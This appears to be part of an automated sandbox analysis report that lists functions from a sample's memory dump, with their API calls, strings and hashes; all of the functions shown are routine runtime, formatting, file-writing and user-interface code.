Opcode ID: 7a2ed12bf8117e8ec1b0c216ef55796560d5e68ad624ecb41d524f8948297cd5
Instruction ID: b5b8aece45814943842a47c3773cd36523fdce35dcffcc9e135345a3dc0209d1
Opcode Fuzzy Hash: 7a2ed12bf8117e8ec1b0c216ef55796560d5e68ad624ecb41d524f8948297cd5
Instruction Fuzzy Hash: 914137B15083459FC710EF65C8809ABBBEAFB89314F04892EF596C6610E734EA59CF52

Function 00692210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00692536

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

Part of subcall function 006A05DA: _wcslen.LIBCMT ref: 006A05E0

Strings

x%u, xrefs: 006926FD
;%u, xrefs: 00692523
xc%u, xrefs: 0069275A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 244fbd4a7a95dff14aa9d8b636e7e8433f0614bc6aeb44a44a6d1104df990085
Instruction ID: a6620f6450f973eaec043a6a2c37571da4e654c747b70944fedd6567abebe719
Opcode Fuzzy Hash: 244fbd4a7a95dff14aa9d8b636e7e8433f0614bc6aeb44a44a6d1104df990085
Instruction Fuzzy Hash: 64F14A70604341ABDF15EF2484A5BFE7B9F5F91300F08056DEC8A9BB83CB648949C766

Function 006A9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006A9D0A

Strings

>, xrefs: 006A9D4B
</p>, xrefs: 006A9DE8
</style>, xrefs: 006A9E52
<style>, xrefs: 006A9E30
<br>, xrefs: 006A9DFE

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 64a6baef33e041fddcdce2d4d0b8e0a23c3f4f8840b3b209929680bc2b11a1e0
Instruction ID: 99b8dbe1c98db1fa2e79e2a2be9b18305a22868b4d1d460ec4649038774ede97
Opcode Fuzzy Hash: 64a6baef33e041fddcdce2d4d0b8e0a23c3f4f8840b3b209929680bc2b11a1e0
Instruction Fuzzy Hash: DC51362670172295DB30BA2598117F673E3EFA3750F78041AE9818B3C2FB658C818A71

Function 006BF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,006BFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 006BF6CF
__fassign.LIBCMT ref: 006BF74A
__fassign.LIBCMT ref: 006BF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 006BF78B
WriteFile.KERNEL32(?,00000000,00000000,006BFE02,00000000,?,?,?,?,?,?,?,?,?,006BFE02,00000000), ref: 006BF7AA
WriteFile.KERNEL32(?,00000000,00000001,006BFE02,00000000,?,?,?,?,?,?,?,?,?,006BFE02,00000000), ref: 006BF7E3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 760759c3594e0402cca715e662ddf8d448bc7c1f701bebc2159dfd840f665c0f
Instruction ID: e321d9b4f2dce906fc4eb5c120da9da31213513d1fc34137404e174544496790
Opcode Fuzzy Hash: 760759c3594e0402cca715e662ddf8d448bc7c1f701bebc2159dfd840f665c0f
Instruction Fuzzy Hash: B65197B1E002499FCB10CFA8DC45AEEBBF6EF09310F14416AE555E7361D771AA85CBA0

Function 006ACE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 006ACE9D

Part of subcall function 0069B690: _wcslen.LIBCMT ref: 0069B696

_swprintf.LIBCMT ref: 006ACED1

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

SetDlgItemTextW.USER32(?,00000066,006D946A), ref: 006ACEF1
_wcschr.LIBVCRUNTIME ref: 006ACF22
EndDialog.USER32(?,00000001), ref: 006ACFFE

Strings

%s%s%u, xrefs: 006ACEC6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: f91cee0d9bd52e7f322ec976e60f8359bc72814c3f67b62563e1bcbc6c364ea7
Instruction ID: 51aa343f2cce4bbe2636217015bdf98e52da84b97c47036b9ce3d9d2d49f3feb
Opcode Fuzzy Hash: f91cee0d9bd52e7f322ec976e60f8359bc72814c3f67b62563e1bcbc6c364ea7
Instruction Fuzzy Hash: 174193B1900258AADF21AB90DC45EEA77FEEB06310F4084A7F90AE7141EE709E45CF65

Function 006B2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006B2937
___except_validate_context_record.LIBVCRUNTIME ref: 006B293F
_ValidateLocalCookies.LIBCMT ref: 006B29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 006B29F3
_ValidateLocalCookies.LIBCMT ref: 006B2A48

Strings

csm, xrefs: 006B29DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 04442698a1280d2fe1dc29e28ba4acb5d42e7e33b855b45fb0d92569ae70f3a9
Instruction ID: 17b3d8c590bb14df839b6d9d6b6814cdc0d2455b6a86ba3b66c4a8d155c5e852
Opcode Fuzzy Hash: 04442698a1280d2fe1dc29e28ba4acb5d42e7e33b855b45fb0d92569ae70f3a9
Instruction Fuzzy Hash: 4141DA70A0021A9FCF10EF69C891AEE7BF6EF45314F148159E819AB352D731DA95CB90

Function 006A9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006A995E
_wcslen.LIBCMT ref: 006A9993

Strings

 , xrefs: 006A9A21
<br>, xrefs: 006A99DF
, xrefs: 006A99B0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 006A9987

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: d89573871283ef1958f836c50456f8266b8d67c9513d0ee94845c2e8395be79f
Instruction ID: 67a074910d1876d27bc05846a969dab103040a05cd87e6fe45cf305f07fc6df3
Opcode Fuzzy Hash: d89573871283ef1958f836c50456f8266b8d67c9513d0ee94845c2e8395be79f
Instruction Fuzzy Hash: 82317D7664434566DA30BB549C42BFBB3A6EB92320F70842FF58647380FB64AD8187B5

Function 006AAAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006AAAD2
GetObjectW.GDI32(?,00000018,?), ref: 006AAB01
ReleaseDC.USER32(00000000,?), ref: 006AAB99

Strings

-j, xrefs: 006AAB32, 006AAB3F, 006AAB73, 006AAB7F
j, xrefs: 006AAB25
7j, xrefs: 006AAB67

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ObjectRelease
String ID: -j$7j$j
API String ID: 1429681911-1843544704
Opcode ID: ea04a36a1ea1471b03aed22b4ef35abcc2e1964c18708cf726cde67661e40b6b
Instruction ID: fcb78ad0141b0873b98d1b39cc059c5609c9542d89209f09670a1d4bd4b123ab
Opcode Fuzzy Hash: ea04a36a1ea1471b03aed22b4ef35abcc2e1964c18708cf726cde67661e40b6b
Instruction Fuzzy Hash: 3921FA72108314BFD3419FA5DC48E7FBFEAFB89351F04181AFA4592220DB319A54CB66

Function 006BC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006BC868: _free.LIBCMT ref: 006BC891

_free.LIBCMT ref: 006BC8F2

Part of subcall function 006B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34), ref: 006B8DE2
Part of subcall function 006B8DCC: GetLastError.KERNEL32(006C3A34,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34,006C3A34), ref: 006B8DF4

_free.LIBCMT ref: 006BC8FD
_free.LIBCMT ref: 006BC908
_free.LIBCMT ref: 006BC95C
_free.LIBCMT ref: 006BC967
_free.LIBCMT ref: 006BC972
_free.LIBCMT ref: 006BC97D

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: aed12c614e23f0091943e5402e9d8c624921ffb07d54a1dda50c0bc3be748689
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 391142B1590B04AAE560B771DC07FCB7BAE9F00B10F400C2DB29D67093DA65B685CB64

Function 006AE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,006AE669,006AE5CC,006AE86D), ref: 006AE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 006AE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 006AE630

Strings

AcquireSRWLockExclusive, xrefs: 006AE615
ReleaseSRWLockExclusive, xrefs: 006AE625
KERNEL32.DLL, xrefs: 006AE600

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: b55afb4c857e5cf5d6391a9c109749a517c88cb4063d7308a9898095af4c9f50
Instruction ID: f0aa7267b9974b807634c39207c1d376e05769b7605ac984b61c83973fc00ade
Opcode Fuzzy Hash: b55afb4c857e5cf5d6391a9c109749a517c88cb4063d7308a9898095af4c9f50
Instruction Fuzzy Hash: 70F0C2327806229B0B216EA55C84AF672CBAA277813017C39D902D7300EB26CD519FA0

Function 006B8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006B891E

Part of subcall function 006B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34), ref: 006B8DE2
Part of subcall function 006B8DCC: GetLastError.KERNEL32(006C3A34,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34,006C3A34), ref: 006B8DF4

_free.LIBCMT ref: 006B8930
_free.LIBCMT ref: 006B8943
_free.LIBCMT ref: 006B8954
_free.LIBCMT ref: 006B8965

Strings

pl, xrefs: 006B8914

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: pl
API String ID: 776569668-1786839575
Opcode ID: 7c1a2503f07cc6ad49b9182b86e44b578494be35b51988ae76ebc82cfdbafee9
Instruction ID: 2dbe5d797302f549ef4646b164875f103053cde7b43d622f1cc1fb99d13e8add
Opcode Fuzzy Hash: 7c1a2503f07cc6ad49b9182b86e44b578494be35b51988ae76ebc82cfdbafee9
Instruction Fuzzy Hash: E2F0B7B18141239F8B866F18FC128E53BBBFB28714391250BF514972B2CB364A81DF85

Function 006A146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 006A14C2

Part of subcall function 0069B146: GetVersionExW.KERNEL32(?), ref: 0069B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006A14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 006A1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 006A1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 006A1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 006A1533

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 344277b10f9e3f73a5f04faab8185fc7219e6b1fa31b188520f0dccb1796eafe
Instruction ID: bdaa39eb37c2bb292468642fa23606583ecfde8f246395af29cb2244d7a8972d
Opcode Fuzzy Hash: 344277b10f9e3f73a5f04faab8185fc7219e6b1fa31b188520f0dccb1796eafe
Instruction Fuzzy Hash: 27310775108355AFC700DFA8C88499BB7E9BF98714F049A1EF995C3210E730D909CBA6

Function 006B2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006B2AF1,006B02FC,006AFA34), ref: 006B2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006B2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006B2B2F
SetLastError.KERNEL32(00000000,006B2AF1,006B02FC,006AFA34), ref: 006B2B81

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 00964f898f074343fc35169fdd29308a8b50a2c9db76a7d3c792df0f277e4360
Instruction ID: ae9add0c826fe3f064e8b8fa66321b373a2567e87530f25bcb9d9922b670dab9
Opcode Fuzzy Hash: 00964f898f074343fc35169fdd29308a8b50a2c9db76a7d3c792df0f277e4360
Instruction Fuzzy Hash: AB01B1B63083236EAB652A746CA9DE62BABEF01778760163EF110552E0EF125D819358

Function 006B97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,006D1030,006B4674,006D1030,?,?,006B3F73,00000050,?,006D1030,00000200), ref: 006B97E9
_free.LIBCMT ref: 006B981C
_free.LIBCMT ref: 006B9844
SetLastError.KERNEL32(00000000,?,006D1030,00000200), ref: 006B9851
SetLastError.KERNEL32(00000000,?,006D1030,00000200), ref: 006B985D
_abort.LIBCMT ref: 006B9863

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 7f287ce3f7aca3a813ec6d8ad98aba506d10fca9cddff2d4dad677c0c37fb8c4
Instruction ID: d50ba8cc9106c473de0d3203aabd5a3d6f3cc1848c6d8b3ad0bfa2881e3947cf
Opcode Fuzzy Hash: 7f287ce3f7aca3a813ec6d8ad98aba506d10fca9cddff2d4dad677c0c37fb8c4
Instruction Fuzzy Hash: 69F0F4B620461166C7923734AC0AEEB2A6B8FD2760F20052DF71593392EE20C8828739

Function 006ADC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 006ADC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006ADC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006ADC72
TranslateMessage.USER32(?), ref: 006ADC7C
DispatchMessageW.USER32(?), ref: 006ADC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 006ADC91

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: e50eb1041f698cf9dc41e780eb54a6cde6ca7bdff8e78a7d49df13eb2a13cb64
Instruction ID: f85b3ae254e89fd683f9df221cc27c73dd09cd78b15bb6095b945f4b7eb2c82d
Opcode Fuzzy Hash: e50eb1041f698cf9dc41e780eb54a6cde6ca7bdff8e78a7d49df13eb2a13cb64
Instruction Fuzzy Hash: C8F0FF72A01229BBCB206BA5DD4CDEF7F7EEF427A1B004011F50BD2251DA75D646CBA0

Function 006AA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 006AA699: GetDC.USER32(00000000), ref: 006AA69D
Part of subcall function 006AA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 006AA6A8
Part of subcall function 006AA699: ReleaseDC.USER32(00000000,00000000), ref: 006AA6B3

GetObjectW.GDI32(?,00000018,?), ref: 006AA83C

Part of subcall function 006AAAC9: GetDC.USER32(00000000), ref: 006AAAD2
Part of subcall function 006AAAC9: GetObjectW.GDI32(?,00000018,?), ref: 006AAB01
Part of subcall function 006AAAC9: ReleaseDC.USER32(00000000,?), ref: 006AAB99

Strings

Aj, xrefs: 006AA9BA
(, xrefs: 006AA9AA
"j, xrefs: 006AA89D, 006AAAB9

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "j$($Aj
API String ID: 1061551593-1555249197
Opcode ID: b6bf69121b79e4538c5eb2247c8a1e1586e7c28daaf0fe65127660fc0d8c4e83
Instruction ID: 77c3a1a3bd3accb532e68848823fb0444f9e9566609c6028d85333410dab726b
Opcode Fuzzy Hash: b6bf69121b79e4538c5eb2247c8a1e1586e7c28daaf0fe65127660fc0d8c4e83
